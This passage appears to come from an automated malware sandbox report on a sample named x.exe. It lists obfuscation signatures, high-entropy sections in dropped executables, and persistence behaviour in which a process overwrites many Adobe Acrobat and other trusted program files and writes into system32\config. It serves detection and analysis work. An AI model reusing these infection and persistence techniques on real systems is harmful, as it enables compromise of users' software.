                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00A98550 push 00A984BAh; ret 1_2_00A983E2
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00A98550 push 00A98426h; ret 1_2_00A984D8
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00A98550 push 00A98075h; ret 1_2_00A984FD
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00A98550 push 00A9808Ch; ret 1_2_00A98512
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00A98550 push 00A98B6Fh; ret 1_2_00A98596
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00A98550 push 00A98E94h; ret 1_2_00A985C9
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00A98550 push 00A9878Bh; ret 1_2_00A98734
                  Source: x.exe.0.drStatic PE information: section name: .reloc entropy: 7.931596244367975
                  Source: AppVClient.exe.1.drStatic PE information: section name: .reloc entropy: 7.935635818408811
                  Source: differences.exe.1.drStatic PE information: section name: .reloc entropy: 7.931596244367975
                  Source: AutoIt3_x64.exe.3.drStatic PE information: section name: .reloc entropy: 7.943921958907293
                  Source: SciTE.exe.3.drStatic PE information: section name: .reloc entropy: 7.912322861829115
                  Source: jucheck.exe.3.drStatic PE information: section name: .reloc entropy: 7.931076642944994
                  Source: jusched.exe.3.drStatic PE information: section name: .reloc entropy: 7.936039619719061
                  Source: elevation_service.exe.3.drStatic PE information: section name: .reloc entropy: 7.943937015504037
                  Source: elevation_service.exe0.3.drStatic PE information: section name: .reloc entropy: 7.945952439170769
                  Source: 7zFM.exe.3.drStatic PE information: section name: .reloc entropy: 7.93213395966444
                  Source: identity_helper.exe.3.drStatic PE information: section name: .reloc entropy: 7.940745738576045
                  Source: setup.exe.3.drStatic PE information: section name: .reloc entropy: 7.944734088789118
                  Source: 7zG.exe.3.drStatic PE information: section name: .reloc entropy: 7.927681994996245
                  Source: Acrobat.exe.3.drStatic PE information: section name: .reloc entropy: 7.940537726504902
                  Source: AcroCEF.exe.3.drStatic PE information: section name: .reloc entropy: 7.937561085260742
                  Source: msedgewebview2.exe.3.drStatic PE information: section name: .reloc entropy: 7.936576878025424
                  Source: msedge_proxy.exe.3.drStatic PE information: section name: .reloc entropy: 7.942268501725781
                  Source: msedge_pwa_launcher.exe.3.drStatic PE information: section name: .reloc entropy: 7.9462623526249425
                  Source: notification_click_helper.exe.3.drStatic PE information: section name: .reloc entropy: 7.944018645209311
                  Source: pwahelper.exe.3.drStatic PE information: section name: .reloc entropy: 7.94089917169034
                  Source: msedge_proxy.exe0.3.drStatic PE information: section name: .reloc entropy: 7.942260650274214
                  Source: pwahelper.exe0.3.drStatic PE information: section name: .reloc entropy: 7.940890321085322
                  Source: SingleClientServicesUpdater.exe.3.drStatic PE information: section name: .reloc entropy: 7.943702236613648
                  Source: AcroCEF.exe0.3.drStatic PE information: section name: .reloc entropy: 7.9375616415242405
                  Source: SingleClientServicesUpdater.exe0.3.drStatic PE information: section name: .reloc entropy: 7.943707433623585
                  Source: MicrosoftEdgeUpdateSetup.exe.3.drStatic PE information: section name: .reloc entropy: 7.939190403002679
                  Source: OneDriveSetup.exe.3.drStatic PE information: section name: .reloc entropy: 7.863774915045104
                  Source: Integrator.exe.3.drStatic PE information: section name: .reloc entropy: 7.759916849983244
                  Source: ADNotificationManager.exe.3.drStatic PE information: section name: .reloc entropy: 7.936842384871835
                  Source: AdobeCollabSync.exe.3.drStatic PE information: section name: .reloc entropy: 7.905865604895901
                  Source: CRLogTransport.exe.3.drStatic PE information: section name: .reloc entropy: 7.938136521584719
                  Source: LogTransport2.exe.3.drStatic PE information: section name: .reloc entropy: 7.9355775626581595
                  Source: adobe_licensing_wf_acro.exe.3.drStatic PE information: section name: .reloc entropy: 7.942434242016713
                  Source: Acrobat.exe0.3.drStatic PE information: section name: .reloc entropy: 7.857651811197106
                  Source: setup.exe0.3.drStatic PE information: section name: .rsrc entropy: 7.644716681434792
                  Source: appvcleaner.exe.3.drStatic PE information: section name: .reloc entropy: 7.935640193882772

                  Persistence and Installation Behavior

                  barindex
                  Creates files in the system32 config directory
                  Source: C:\Windows\System32\alg.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Roaming\31d53b0537b9f482.binJump to behavior
                  Drops executable to a common third party application directory
                  Source: C:\Users\user\AppData\Local\Temp\x.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
